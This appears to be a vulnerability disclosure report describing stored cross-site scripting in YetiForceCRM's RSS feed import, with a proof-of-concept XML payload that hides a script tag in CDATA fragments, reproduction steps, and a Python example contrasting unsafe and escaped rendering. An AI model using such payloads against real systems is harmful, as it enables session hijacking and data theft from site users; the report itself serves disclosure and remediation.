Stored XSS vulnerability when importing RSS Feeds from external source in yetiforcecompany/yetiforcecrm
Valid
Reported on Aug 12th 2022
Description
YetiForceCRM allows users to create RSS feeds without properly purifying the link field of the data fetched from the external source. An attacker can take advantage of this to perform an XML injection attack that results in stored cross-site scripting (XSS) on the target server.
Proof of Concept
Payload
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>RSS Test</title>
<link><![CDATA["]]><![CDATA[>]]><![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></link>
<description>RSS Test Description</description>
<lastBuildDate>Fri, 12 Aug 2022 00:00:00 -0000</lastBuildDate>
<item>
<title>RSS Test</title>
<link>http://example.com</link>
<description>a post</description>
<author>user@example.com</author>
<pubDate>Fri, 12 Aug 2022 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>
Reproduction steps
Step 1: Create a file rss_xss.xml with the content of the payload above
Step 2: Add Feed Source via module Rss
Step 3: Click Save and the XSS should fire
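As an added illustration (not part of the report or of YetiForce's own code), the Python snippet below parses a feed constructed from the payload above, shows the link text an XML parser hands to a template once the CDATA fragments are joined, and contrasts raw interpolation with a scheme check plus HTML escaping. The feed string, function names and the http/https allow-list are assumptions for this example.

```python
import html
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed feed modelled on the report's payload: the CDATA sections
# concatenate into a quote-close-tag sequence once the XML is parsed.
FEED = """<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title>RSS Test</title>
<link><![CDATA["]]><![CDATA[>]]><![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></link>
<description>RSS Test Description</description>
</channel>
</rss>"""


def channel_link(feed_xml: str) -> str:
    """Return the channel <link> text exactly as an XML parser yields it."""
    root = ET.fromstring(feed_xml.encode("utf-8"))
    return root.findtext("channel/link") or ""


def render_unsafe(link: str) -> str:
    """Template that interpolates the link raw (the pattern the report describes)."""
    return f'<a href="{link}">feed</a>'


def safe_link(link: str) -> str:
    """Accept only absolute http(s) URLs (assumed policy); anything else is dropped."""
    candidate = link.strip()
    parts = urlsplit(candidate)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return ""
    return candidate


def render_safe(link: str) -> str:
    """Validate the scheme, then HTML-escape so quotes and brackets cannot break out."""
    return f'<a href="{html.escape(safe_link(link), quote=True)}">feed</a>'


if __name__ == "__main__":
    link = channel_link(FEED)
    print("parsed link:", link)          # the joined CDATA fragments
    print("unsafe:", render_unsafe(link))  # script tag lands in the page
    print("safe:  ", render_safe(link))    # link rejected, nothing injected
```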
Impact
This vulnerability allows attackers to hijack the user's current session, steal sensitive information, deface the website, or redirect users to malicious websites.
Occurrences
The fix bounty has been dropped
This vulnerability will not receive a CVE
RssFeedContents.tpl#L51 has been validated